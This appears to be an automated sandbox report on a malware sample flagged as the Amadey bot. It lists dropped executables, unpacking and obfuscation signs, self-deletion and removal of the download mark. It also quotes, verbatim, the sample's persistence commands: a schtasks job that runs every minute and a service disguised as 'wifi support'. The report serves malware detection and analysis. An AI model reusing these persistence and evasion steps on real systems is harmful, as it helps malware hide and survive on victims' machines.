                          Source: Binary string: C:\lalovum36_po.pdb source: tijXCZsbGe.exe, tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdbN source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbR source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: C:\lalovum36_po.pdbh source: tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp

                          Data Obfuscation:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeUnpacked PE file: 16.2.DB31.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeUnpacked PE file: 17.2.E748.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeUnpacked PE file: 32.2.gecrjwsv.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeUnpacked PE file: 38.2.5C89.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeUnpacked PE file: 38.2.5C89.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeUnpacked PE file: 16.2.DB31.exe.400000.0.unpack .text:ER;.data:W;.gave:W;.noduf:W;.gafal:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeUnpacked PE file: 17.2.E748.exe.400000.0.unpack .text:ER;.data:W;.sop:W;.fob:W;.hasajo:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeUnpacked PE file: 32.2.gecrjwsv.exe.400000.0.unpack .text:ER;.data:W;.sop:W;.fob:W;.hasajo:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeUnpacked PE file: 38.2.5C89.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 35.0.F65C.exe.4d0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0043E184 push ebp; retf
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 9_2_00633634 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0047127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0047123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0047735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_004753C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00896F0B push 0000002Bh; iretd
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00894715 push ds; ret
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_00AB8508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_00AB764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02E54003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02ED0D8C push E86C8B43h; retf
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_054B2503 push E80A995Eh; ret
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0042D9F0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: F65C.exe.5.drStatic PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: tijXCZsbGe.exeStatic PE information: section name: .koyalef
                          Source: tijXCZsbGe.exeStatic PE information: section name: .bopi
                          Source: tijXCZsbGe.exeStatic PE information: section name: .cegem
                          Source: 6FB4.exe.5.drStatic PE information: section name: .gizi
                          Source: 6FB4.exe.5.drStatic PE information: section name: .bur
                          Source: 6FB4.exe.5.drStatic PE information: section name: .wob
                          Source: DB31.exe.5.drStatic PE information: section name: .gave
                          Source: DB31.exe.5.drStatic PE information: section name: .noduf
                          Source: DB31.exe.5.drStatic PE information: section name: .gafal
                          Source: E748.exe.5.drStatic PE information: section name: .sop
                          Source: E748.exe.5.drStatic PE information: section name: .fob
                          Source: E748.exe.5.drStatic PE information: section name: .hasajo
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name: .28gybOo
                          Source: 8783.exe.5.drStatic PE information: section name: .adata
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name: .28gybOo
                          Source: 9DFA.exe.5.drStatic PE information: section name: .adata
                          Source: C7FA.exe.5.drStatic PE information: section name: .didata
                          Source: rifsswe.5.drStatic PE information: section name: .koyalef
                          Source: rifsswe.5.drStatic PE information: section name: .bopi
                          Source: rifsswe.5.drStatic PE information: section name: .cegem
                          Source: gecrjwsv.exe.17.drStatic PE information: section name: .sop
                          Source: gecrjwsv.exe.17.drStatic PE information: section name: .fob
                          Source: gecrjwsv.exe.17.drStatic PE information: section name: .hasajo
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: 8783.exe.5.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: F65C.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: 9DFA.exe.5.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96511151774
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.98468263043
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.95999300846
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96511151774
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.95999300846
                          Source: F65C.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 18.0.F65C.exe.ab0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 35.0.F65C.exe.4d0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 35.0.F65C.exe.4d0000.13.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 35.0.F65C.exe.4d0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 35.0.F65C.exe.4d0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 35.0.F65C.exe.4d0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 35.0.F65C.exe.4d0000.7.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          barindex
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000029.00000002.953737182.0000000000821000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.953617420.00000000007C3000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.953715192.0000000000812000.00000004.00000001.sdmp, type: MEMORY
                          Drops executables to the windows directory (C:\Windows) and starts themShow sources
                          Source: unknownExecutable created and started: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rifssweJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C7FA.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E748.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6FB4.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rifssweJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8783.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B0F7.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9334.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9DFA.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeFile created: C:\Users\user\AppData\Local\Temp\gecrjwsv.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DB31.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F65C.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5C89.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe (copy)Jump to dropped file

                          Boot Survival:

                          barindex
                          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\xzxafeeu
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\tijxczsbge.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rifsswe:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
